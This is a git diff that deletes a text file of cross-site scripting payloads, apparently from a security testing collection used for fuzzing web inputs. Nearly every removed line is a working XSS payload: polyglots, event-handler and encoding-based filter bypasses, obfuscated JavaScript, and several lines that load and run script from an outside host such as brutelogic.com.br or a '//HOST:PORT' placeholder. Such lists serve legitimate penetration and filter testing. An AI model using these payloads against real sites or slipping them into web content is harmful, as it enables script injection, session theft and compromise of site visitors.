diff --git a/XSS Injection/Intruders/IntrudersXSS.txt b/XSS Injection/Intruders/IntrudersXSS.txt deleted file mode 100644 index b7e741fa..00000000 --- a/XSS Injection/Intruders/IntrudersXSS.txt +++ /dev/null @@ -1,179 +0,0 @@ - -ipt>alert('XSS')ipt> -"> -"> - - - -xss -"> -"> - - - - -"> -"> - - -data:text/html, -data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ -jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e - ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> -" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// -';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> -javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* -javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a -javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ -javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* -javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* -javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// -javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* ---></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* -/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* -javascript://--></title></style></textarea></script><svg "//' onclick=alert()// -/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* -<object onafterscriptexecute=confirm(0)> -<object onbeforescriptexecute=confirm(0)> -<script>window['alert'](document['domain'])<script> -<img src='1' onerror/=alert(0) /> -<script>window['alert'](0)</script> -<script>parent['alert'](1)</script> -<script>self['alert'](2)</script> -<script>top['alert'](3)</script> -"><svg onload=alert(1)// -"onmouseover=alert(1)// -"autofocus/onfocus=alert(1)// -'-alert(1)-' -'-alert(1)// -\'-alert(1)// -</script><svg onload=alert(1)> -<x contenteditable onblur=alert(1)>lose focus! -<x onclick=alert(1)>click this! -<x oncopy=alert(1)>copy this! -<x oncontextmenu=alert(1)>right click this! -<x oncut=alert(1)>cut this! -<x ondblclick=alert(1)>double click this! -<x ondrag=alert(1)>drag this! -<x contenteditable onfocus=alert(1)>focus this! -<x contenteditable oninput=alert(1)>input here! -<x contenteditable onkeydown=alert(1)>press any key! -<x contenteditable onkeypress=alert(1)>press any key! -<x contenteditable onkeyup=alert(1)>press any key! -<x onmousedown=alert(1)>click this! -<x onmousemove=alert(1)>hover this! -<x onmouseout=alert(1)>hover this! -<x onmouseover=alert(1)>hover this! -<x onmouseup=alert(1)>click this! -<x contenteditable onpaste=alert(1)>paste here! -<script>alert(1)// -<script>alert(1)<!– -<script src=//brutelogic.com.br/1.js> -<script src=//3334957647/1> -%3Cx onxxx=alert(1) -<%78 onxxx=1 -<x %6Fnxxx=1 -<x o%6Exxx=1 -<x on%78xx=1 -<x onxxx%3D1 -<X onxxx=1 -<x OnXxx=1 -<X OnXxx=1 -<x onxxx=1 onxxx=1 -<x/onxxx=1 -<x%09onxxx=1 -<x%0Aonxxx=1 -<x%0Conxxx=1 -<x%0Donxxx=1 -<x%2Fonxxx=1 -<x 1='1'onxxx=1 -<x 1="1"onxxx=1 -<x </onxxx=1 -<x 1=">" onxxx=1 -<http://onxxx%3D1/ -<x onxxx=alert(1) 1=' -<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> -'onload=alert(1)><svg/1=' -'>alert(1)</script><script/1=' -*/alert(1)</script><script>/* -*/alert(1)">'onload="/*<svg/1=' -`-alert(1)">'onload="`<svg/1=' -*/</script>'>alert(1)/*<script/1=' -<script>alert(1)</script> -<script src=javascript:alert(1)> -<iframe src=javascript:alert(1)> -<embed src=javascript:alert(1)> -<a href=javascript:alert(1)>click -<math><brute href=javascript:alert(1)>click -<form action=javascript:alert(1)><input type=submit> -<isindex action=javascript:alert(1) type=submit value=click> -<form><button formaction=javascript:alert(1)>click -<form><input formaction=javascript:alert(1) type=submit value=click> -<form><input formaction=javascript:alert(1) type=image value=click> -<form><input formaction=javascript:alert(1) type=image src=SOURCE> -<isindex formaction=javascript:alert(1) type=submit value=click> -<object data=javascript:alert(1)> -<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> -<svg><script xlink:href=data:,alert(1) /> -<math><brute xlink:href=javascript:alert(1)>click -<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> -<html ontouchstart=alert(1)> -<html ontouchend=alert(1)> -<html ontouchmove=alert(1)> -<html ontouchcancel=alert(1)> -<body onorientationchange=alert(1)> -"><img src=1 onerror=alert(1)>.gif -<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> -GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; -<script src="data:&comma;alert(1)// -"><script src=data:&comma;alert(1)// -<script src="//brutelogic.com.br&sol;1.js&num; -"><script src=//brutelogic.com.br&sol;1.js&num; -<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; -"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; -<base href=//0> -<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1) -<body onload=alert(1)> -<body onpageshow=alert(1)> -<body onfocus=alert(1)> -<body onhashchange=alert(1)><a href=#x>click this!#x -<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x -<body onscroll=alert(1)><br><br><br><br> -<body onresize=alert(1)>press F12! -<body onhelp=alert(1)>press F1! (MSIE) -<marquee onstart=alert(1)> -<marquee loop=1 width=0 onfinish=alert(1)> -<audio src onloadstart=alert(1)> -<video onloadstart=alert(1)><source> -<input autofocus onblur=alert(1)> -<keygen autofocus onfocus=alert(1)> -<form onsubmit=alert(1)><input type=submit> -<select onchange=alert(1)><option>1<option>2 -<menu id=x contextmenu=x onshow=alert(1)>right click me! -<script>\u0061\u006C\u0065\u0072\u0074(1)</script> -<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" /> -<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> -<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> -<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> -<img src=1 alt=al lang=ert onerror=top[alt+lang](0)> -<script>$=1,alert($)</script> -<script ~~~>confirm(1)</script ~~~> -<script>$=1,\u0061lert($)</script> -<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script> -<</script/script><script ~~~>\u0061lert(1)</script ~~~> -</style></scRipt><scRipt>alert(1)</scRipt> -<img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;> -<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)> -<svg><x><script>alert&#40;&#39;1&#39;&#41</x> -<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>